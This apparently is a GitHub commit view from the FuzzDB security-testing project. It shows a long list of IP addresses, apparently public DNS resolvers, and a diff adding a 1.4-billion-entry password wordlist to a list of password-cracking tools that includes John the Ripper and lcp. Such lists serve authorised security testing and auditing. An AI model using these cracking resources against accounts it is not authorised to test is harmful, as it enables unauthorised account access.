213.115.244.69
213.128.194.2
213.131.178.10
213.135.67.1
213.151.109.1
213.157.0.194
213.157.196.130
213.157.196.131
213.157.196.132
213.158.72.1
213.16.104.61
213.164.38.66
213.171.220.209
213.172.33.34
213.178.66.2
213.184.242.6
213.211.50.1
213.211.50.2
213.218.117.85
213.234.128.211
213.235.248.228
213.239.204.35
213.241.193.250
213.244.72.31
213.27.209.53
213.27.209.8
213.55.96.166
213.8.145.133
213.88.195.146
213.88.195.147
213.88.195.148
216.106.1.2
216.106.184.6
216.131.94.5
216.131.95.20
216.136.95.2
216.138.119.6
216.146.35.230
216.147.131.33
216.17.128.1
216.17.128.2
216.175.203.51
216.181.31.11
216.184.96.4
216.184.96.5
216.184.96.6
216.185.64.6
216.186.27.15
216.194.28.33
216.198.139.68
216.21.128.22
216.21.129.22
216.218.221.6
216.218.226.238
216.235.1.3
216.237.221.42
216.244.192.3
216.244.192.32
216.254.141.13
216.254.141.2
216.254.95.2
216.27.175.2
216.47.160.12
216.47.160.13
216.52.126.1
216.52.129.1
216.52.161.33
216.52.169.1
216.52.190.33
216.52.254.1
216.52.254.33
216.52.41.1
216.52.41.33
216.52.65.1
216.52.65.33
216.52.94.1
216.52.94.33
216.52.97.33
216.54.201.11
216.58.97.20
216.58.97.21
216.66.22.2
216.66.38.58
216.66.80.26
216.66.80.30
216.66.80.98
216.81.128.132
216.81.96.67
216.81.96.68
217.107.10.254
217.107.11.35
217.113.48.1
217.115.16.2
217.115.16.3
217.117.0.38
217.117.111.1
217.144.144.211
217.144.6.6
217.148.0.17
217.149.155.180
217.149.17.1
217.15.17.2
217.156.106.1
217.173.198.3
217.17.34.68
217.174.252.116
217.18.206.12
217.18.206.22
217.18.80.105
217.18.90.105
217.196.1.5
217.196.1.6
217.219.236.8
217.22.209.254
217.24.112.2
217.27.240.20
217.28.113.13
217.28.98.62
217.31.204.130
217.32.105.66
217.64.163.1
217.64.167.1
217.65.192.1
217.66.226.8
217.69.160.18
217.69.169.25
217.72.1.2
217.72.168.34
217.73.17.110
217.76.240.2
217.78.80.70
217.78.80.74
217.79.225.8
217.8.180.98
218.102.23.228
218.192.240.2
218.223.32.1
218.232.110.36
218.232.110.37
219.250.36.130
219.252.2.100
220.128.173.228
220.227.60.12
220.233.0.1
221.139.13.130
24.154.1.4
24.154.1.5
35.8.2.41
35.8.2.42
35.8.2.45
35.8.98.43
37.19.5.135
37.235.1.174
37.235.1.177
42.62.176.30
4.79.132.219
50.21.174.18
58.68.121.230
58.96.3.34
61.19.252.238
61.208.115.242
61.56.211.185
61.63.0.66
61.70.87.96
62.105.17.252
62.108.161.161
62.109.182.2
62.116.30.200
62.128.1.42
62.128.1.53
62.129.252.215
62.129.252.252
62.134.11.4
62.140.239.1
62.141.38.230
62.149.128.2
62.165.32.250
62.165.33.250
62.168.59.67
62.177.42.174
62.196.2.70
62.20.15.234
62.20.57.226
62.231.76.49
62.233.128.17
62.24.228.202
62.33.203.33
62.3.32.16
62.3.32.17
62.36.225.150
62.37.225.56
62.37.225.57
62.37.228.20
62.40.32.34
62.76.76.62
62.77.85.100
62.77.85.98
62.77.94.72
62.8.96.38
62.94.0.41
62.94.0.42
62.95.15.107
62.97.84.4
63.105.204.164
63.171.232.38
63.171.232.39
63.218.44.186
63.251.129.33
63.251.161.1
63.251.161.33
63.251.62.1
63.251.62.33
64.105.163.106
64.105.172.26
64.105.179.138
64.105.189.26
64.105.199.74
64.105.199.76
64.105.202.138
64.105.97.90
64.119.60.5
64.119.60.9
64.13.115.12
64.132.61.131
64.132.94.250
64.13.48.12
64.135.1.20
64.135.1.22
64.254.99.13
64.56.129.2
64.61.99.2
64.79.224.3
64.81.127.2
64.81.159.2
64.94.1.1
64.94.1.33
64.94.33.33
65.163.107.11
65.203.109.2
65.39.139.53
65.74.130.5
65.74.130.6
66.118.80.4
66.119.93.10
66.119.93.4
66.163.0.161
66.163.0.173
66.165.177.69
66.165.183.87
66.182.208.5
66.203.72.10
66.207.160.111
66.216.18.222
66.218.245.13
66.218.44.5
66.232.139.10
66.252.170.3
66.28.0.45
66.28.0.61
66.51.206.100
66.80.130.18
66.81.0.252
66.92.159.2
66.92.224.2
66.92.64.2
66.93.87.2
67.100.88.27
67.214.64.6
68.179.203.94
69.146.17.3
69.16.169.11
69.16.170.11
69.24.112.11
69.25.1.1
69.25.1.33
69.26.129.2
69.28.104.5
69.28.136.102
69.28.148.102
69.28.97.4
69.54.70.15
69.67.97.18
69.7.192.1
69.7.192.2
70.36.0.5
70.36.0.6
72.11.150.10
72.11.150.74
72.52.104.74
74.222.30.2
74.82.46.6
75.94.255.12
76.73.18.50
77.240.144.164
77.241.112.23
77.247.176.114
77.41.229.2
77.72.192.3
77.73.104.3
77.87.152.9
77.88.8.1
77.88.8.2
77.88.8.8
77.88.8.88
78.159.224.224
78.159.232.232
78.31.96.2
79.132.192.2
79.141.81.250
79.141.82.250
79.141.83.250
80.149.86.20
80.254.79.157
80.67.169.12
80.72.146.2
80.73.1.1
80.74.160.11
80.79.179.2
80.84.72.20
80.88.171.16
80.92.178.98
80.94.48.254
81.17.66.14
81.17.72.70
81.180.201.98
81.18.242.100
81.189.212.129
81.18.97.50
81.200.80.11
81.222.80.2
81.23.144.250
81.24.128.146
81.25.152.2
81.27.133.50
81.27.135.50
81.28.128.34
8.15.12.5
81.7.200.80
81.92.96.22
81.92.97.12
81.95.128.218
82.115.163.2
82.141.136.2
82.144.181.1
82.145.160.140
82.145.163.1
82.151.90.1
82.198.129.138
82.199.32.36
82.212.67.100
82.212.67.101
82.96.65.2
82.96.81.10
82.96.86.20
82.99.211.195
83.137.41.8
83.137.41.9
83.142.192.2
83.142.9.30
83.143.12.246
83.143.8.220
83.149.244.194
83.151.112.193
83.166.8.18
83.240.154.200
83.242.140.10
83.97.97.3
84.200.69.80
84.200.70.40
84.8.2.11
85.114.105.3
85.115.224.18
85.119.136.158
85.119.72.2
85.124.252.33
85.132.32.41
85.132.32.42
85.158.50.50
85.174.190.2
8.5.244.5
85.88.19.10
85.88.19.11
87.103.133.167
87.104.254.135
87.104.254.39
87.197.40.58
87.204.12.130
87.204.28.12
87.229.99.1
88.147.158.1
88.255.242.6
88.255.96.196
8.8.4.4
88.82.84.129
8.8.8.8
89.107.129.15
89.107.16.2
89.185.75.244
89.186.66.6
89.186.66.7
89.233.250.137
89.249.224.1
90.189.109.2
91.143.20.6
91.144.248.227
91.185.2.10
91.185.6.10
91.188.0.35
91.188.0.5
91.194.112.10
91.197.164.11
91.198.154.133
91.199.139.1
91.203.177.4
91.203.188.1
91.207.40.2
91.210.24.22
91.211.16.6
91.212.56.5
91.214.72.33
91.214.72.34
91.98.128.112
92.43.224.1
93.157.14.65
93.157.233.3
93.188.152.3
94.247.200.2
94.247.200.3
95.158.128.2
95.158.129.2
95.173.193.3
95.85.9.86

View file

@ -31,4 +31,6 @@ http://www.openwall.com/john/
lcp - free l0phtcrack replacement lcp - free l0phtcrack replacement
http://www.lcpsoft.com/english/download.htm http://www.lcpsoft.com/english/download.htm
1.4 billion password wordlist (4gb+, too big to include in FuzzDB)
https://gist.github.com/scottlinux/9a3b11257ac575e4f71de811322ce6b3